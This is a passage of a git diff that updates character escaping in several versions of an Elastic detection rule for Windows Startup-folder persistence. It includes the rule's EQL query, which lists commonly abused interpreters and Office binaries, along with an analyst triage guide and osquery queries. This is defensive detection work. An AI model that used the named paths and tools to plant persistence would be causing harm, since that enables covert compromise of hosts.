- Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", "references": [ "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json index c435644c8fd..8379fbd9f8c 100644 --- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", "references": [ "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json index 8602cf217f0..4460c870a8c 100644 --- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", "references": [ "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json index 820bc3f03cb..99eed6961ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 